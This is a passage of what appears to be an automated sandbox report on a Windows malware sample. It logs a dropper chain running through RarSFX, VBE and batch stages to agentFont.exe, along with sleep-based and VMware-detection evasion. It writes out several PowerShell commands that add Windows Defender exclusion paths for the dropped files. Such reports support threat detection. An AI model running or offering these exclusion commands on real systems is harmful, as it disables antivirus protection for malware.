                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -594515s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -594403s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -594285s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -594156s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -594031s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -593922s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -593811s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -593703s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -593594s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -593484s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -593375s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -593203s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -593078s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -592962s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -592625s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -592277s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -592150s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -592031s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -591922s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -591812s >= -30000s
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\mshypercomponentSavesdll\agentFont.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F1A9A0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCurrentProcessId,GetCommandLineW,ShellExecuteExW,WaitForInputIdle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7B8F1A9A0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F0341C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7B8F0341C
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F2EBC0 FindFirstFileExA,0_2_00007FF7B8F2EBC0
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0072A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_0072A69B
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0073C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_0073C220
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F2104C VirtualQuery,GetSystemInfo,0_2_00007FF7B8F2104C
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 922337203685477
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeThread delayed: delay time: 922337203685477
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 30000
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 922337203685477
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 600000
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599818
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599656
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599546
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599437
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599328
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599218
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599109
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 598998
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 598890
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 3600000
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 598781
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 598668
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 598297
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597891
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597750
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597639
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597469
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597337
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597203
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597086
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596983
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596874
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596762
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596656
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596547
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596437
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596266
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596154
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596031
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 595900
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 595796
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 595305
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 595078
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594953
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594844
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594734
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594625
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594515
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594403
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594285
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594156
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594031
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593922
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593811
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593703
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593594
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593484
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593375
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593203
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593078
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 592962
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 592625
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 592277
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 592150
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 592031
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 591922
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 591812
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Local\Temp\RarSFX0\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\AppData\Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeFile opened: C:\Users\user\Jump to behavior
                                Source: wscript.exe, 00000002.00000003.1685319760.0000000000B2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: f5Mb10zb.exe, 00000001.00000003.1672189302.0000000002C63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\$
                                Source: wscript.exe, 00000002.00000003.1685319760.0000000000B2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: agentFont.exe, 00000005.00000002.1789284516.000000001C4F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3FQ
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeAPI call chain: ExitProcess graph end nodegraph_0-25486
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeAPI call chain: ExitProcess graph end nodegraph_1-25002
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F22B90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B8F22B90
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_00747DEE mov eax, dword ptr fs:[00000030h]1_2_00747DEE
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F2FC40 GetProcessHeap,0_2_00007FF7B8F2FC40
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess token adjusted: Debug
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess token adjusted: Debug
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeProcess token adjusted: Debug
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeProcess token adjusted: Debug
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F22B90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B8F22B90
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F22D70 SetUnhandledExceptionFilter,0_2_00007FF7B8F22D70
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F21F60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7B8F21F60
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F26608 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B8F26608
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0073F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0073F838
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0073F9D5 SetUnhandledExceptionFilter,1_2_0073F9D5
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_0073FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0073FBCA
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: 1_2_00748EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00748EBD
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Adds a directory exclusion to Windows Defender
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ApplicationFrameHost.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\agentFont.exe'
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ApplicationFrameHost.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\agentFont.exe'Jump to behavior
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F1A9A0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCurrentProcessId,GetCommandLineW,ShellExecuteExW,WaitForInputIdle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7B8F1A9A0
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\mshypercomponentSavesdll\kNSe5xQ3wI9ft6pWJZ9EeFYPDfgbdbVMsQk13JHxpBJ7xdPC40.vbe" Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\mshypercomponentSavesdll\1fgSUpJ8Uk5BF.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\mshypercomponentSavesdll\agentFont.exe "C:\mshypercomponentSavesdll/agentFont.exe"Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\RuntimeBroker.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ApplicationFrameHost.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mshypercomponentSavesdll\agentFont.exe'Jump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\z0MvDYgz73.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\mshypercomponentSavesdll\agentFont.exe "C:\mshypercomponentSavesdll\agentFont.exe"
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: 0_2_00007FF7B8F0D484 cpuid 0_2_00007FF7B8F0D484
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF7B8F19AC4
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exeCode function: GetLocaleInfoW,GetNumberFormatW,1_2_0073AF0F
                                Source: C:\mshypercomponentSavesdll\agentFont.exeQueries volume information: C:\mshypercomponentSavesdll\agentFont.exe VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
